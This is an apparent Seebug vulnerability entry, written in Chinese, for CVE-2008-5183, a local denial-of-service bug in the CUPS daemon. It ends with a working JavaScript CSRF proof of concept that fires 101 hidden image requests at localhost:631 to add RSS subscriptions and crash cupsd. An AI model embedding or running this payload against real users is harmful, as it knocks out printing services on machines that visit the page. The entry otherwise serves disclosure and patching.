CUPS cupsd RSS订阅空指针引用本地拒绝服务漏洞

2008-12-23T00:00:00
ID SSV:4583
Type seebug
Reporter Root
Modified 2008-12-23T00:00:00

Description

BUGTRAQ ID: 32419 CVE(CAN) ID: CVE-2008-5183

Common Unix Printing System(CUPS)是一款通用Unix打印系统,是Unix环境下的跨平台打印解决方案,基于Internet打印协议,提供大多数PostScript和raster打印机服务。

如果向默认监听于631/tcp端口的CUPS守护程序(/usr/sbin/cupsd)添加了多于100个RSS订阅的话,就会触发空指针引用,导致守护程序崩溃。

Easy Software Products CUPS < 1.3.8 RedHat


RedHat已经为此发布了一个安全公告(RHSA-2008:1029-01)以及相应补丁: RHSA-2008:1029-01:Moderate: cups security update 链接:<a href=https://www.redhat.com/support/errata/RHSA-2008-1029.html target=_blank>https://www.redhat.com/support/errata/RHSA-2008-1029.html</a>

                                        
                                            
                                                &lt;script&gt;
// make 101 CSRFed requests to CUPS daemon via &amp;apos;img&amp;apos; tags
// causes CUPS daemon to crash
// by Adrian &amp;apos;pagvac&amp;apos; Pastor | GNUCITIZEN.org

for(var i=1;i&lt;=101;++i) {
    document.write(&quot;&lt;img width=0 height=0 &quot; +
        &quot;src=\&quot;http://localhost:631/admin/?OP=add-rss-subscription&amp;SUBSCRIPTION_NAME=DOS_TEST_&quot; +
        i + &quot;&amp;PRINTER_URI=%23ALL%23&amp;EVENT_JOB_CREATED=on&amp;MAX_EVENTS=20\&quot;&gt;&quot;);
}
&lt;/script&gt;